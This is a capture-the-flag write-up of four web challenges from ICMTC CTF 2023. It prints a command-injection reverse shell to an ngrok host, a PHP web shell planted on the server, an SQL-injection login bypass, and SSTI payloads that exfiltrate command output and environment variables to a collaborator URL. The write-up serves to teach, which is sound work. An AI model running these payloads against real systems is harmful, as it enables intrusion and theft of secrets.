ICMTC CTF 2023 Write-up (Web Exploitation)

Anas Ibrahim
6 min readJul 4, 2023

--

CTF

Comparison (100 point)

After connecting to the challenge, I found a PHP code that describes the presence of a text parameter. In order to obtain the flag, one must correctly input the value of the parameter, as shown in the following image.

php code.

When i wrote http://159.65.116.234:8087/?text=1e3 it returned Try Again

Therfore, I used the dirsearch tool to perform directory fuzzing and discovered the existence of the following paths.

/index.php

/index.php/login

dirsearch results.

However, when I attempted to add the parameter value after the index.phppath, it still returned Try Again. As a result, I decided to investigate the meaning of the textparameter value by conducting a Google search on what 1e3 represents, as shown in the following image.

1e3 to represent 1000 in decimal.

Finally, I input a value of 1000in decimal format as the textparameter, and the flag was successfully displayed.

The flag

Ping me (100 point)

This challenge required pinging an IP address and sending four packets to the target host.

ping me challenge

I suspected that the challenge could be vulnerable to command injection. So, I executed the ;whoamicommand and it returned www-data. However, the application does not accept spaces.

To bypass this limitation, I referred to the PayloadAllTheThings project on Github. I discovered that I could use the <character in place of a space to execute commands. Using this technique, I was able to read the /etc/passwdfile, which contains information about all users on the system.

/etc/passwd

After several unsuccessful attempts at obtaining the flag directly, I decided to try a reverse shell with netcat. However, this method did not work. Therefore, I opted to utilize an Ngrok server to listen on localhostand obtain a reverse shell. I activated Ngrok and listened on port 8888using the following command.

sudo ngrok tcp 8888
ngrok

I attempted to obtain a reverse shell using the following command:

;sh</dev/tcp/7.tcp.eu.ngrok.io/11276
requesting reverse shell

Next, I listened on port 8888 using netcat by running the command nc -nlvp 8888 as shown below.

Listener on port 8888

So, I obtained a blind reverse shell because the output did not appear directly to me. As a result, I decided to upload a file containing PHP code, which was as follows: echo '<?php system($_REQUEST['flag']) ?>' > hacker.php.

the output is blind also

Then I ran the ;lscommand on ping me page and found that hacker.php was uploaded successfully. So, I attempted to run commands from the flag parameter that I uploaded in hacker.php, and it worked successfully.

www-data

I intercepted the request and searched for the flag using the find command with the following syntax: find / -name flag*. The command returned more than one flag in the /tmp directory.

/tmp/flag*

I wanted to read the first flag, and I was able to successfully submit it. using cat /tmp/flag_DKAVBS.txt

The flag.

Hidden in the plain sight (132 point)

I opened the challenge and found that the title was Nothing Here as the following image

nothing here

I used Diresearch to make directory fuzzing, and while searching through it, I discovered the robots.txtfile. After opening the file, I found two paths that redirected to /login.php. Therefore, I needed to bypass the login in order to obtain the flag.

I believed that the login page might be vulnerable to error-based SQL injection because when I entered admin’, it returned an SQL error syntax. Therefore, I attempted to bypass the login page using the following payload: admin' -- -.

bypassing login using sqli

So , It logged me in as an admin.

admin.php

After returning to the robots.txtfile, I attempted to access the /su3rSecrtttttpath and was able to successfully obtain the flag.

The flag.

EvilCalc (460 point)

This challenge involves calculating your net salary, and it requires four inputs: salary_number, medical_insurance, social_insurance, and taxes. The last input was reflected on the page as the following image, so I suspected that it might be vulnerable to template injection.

evilcalc.

I intercepted the request and attempted to inject payloads such as ${7*7}, which resulted in an error. However, when I tried {{7*7}}, there was no error returned. Therefore, I suspected that the application might be vulnerable to blind Server-Side Template Injection (SSTI).

there was no error when using {{7*7}} otherwise ${7*7} returned error.

At the beginning, I believed that the built-in framework was Jinja2 (Python), but it turned out to be Node.js. Therefore, I searched for payloads to exploit this vulnerability and used the PayloadAllTheThings repository to obtain them. I found a payload that returned the ‘id’, but it was blind. As a result, I sent the request to a collaborator to obtain the result.

curl http://burpcollaborator/?data=`id`
id

Press on poll now on collaborator and the result was node user

node user

Next, I attempted to print process.env, which contains all of the environment processes with the same payload. However, it was not successful. Therefore, I searched for another payload and found one that worked successfully.

process.env

Overall, this code snippet sends an HTTP GET request to the specified collaborator URL and sends the environment variables of the current process as data in the query parameter named data.

Navigate to collaborator.

environment variables

After sending the environment variables to the decoder, I was able to successfully obtain the flag from a variable called FLAG.

The flag.

Finally, I hope you found the writeup helpful. I explained all of the challenges to the best of my ability.

done.

--

--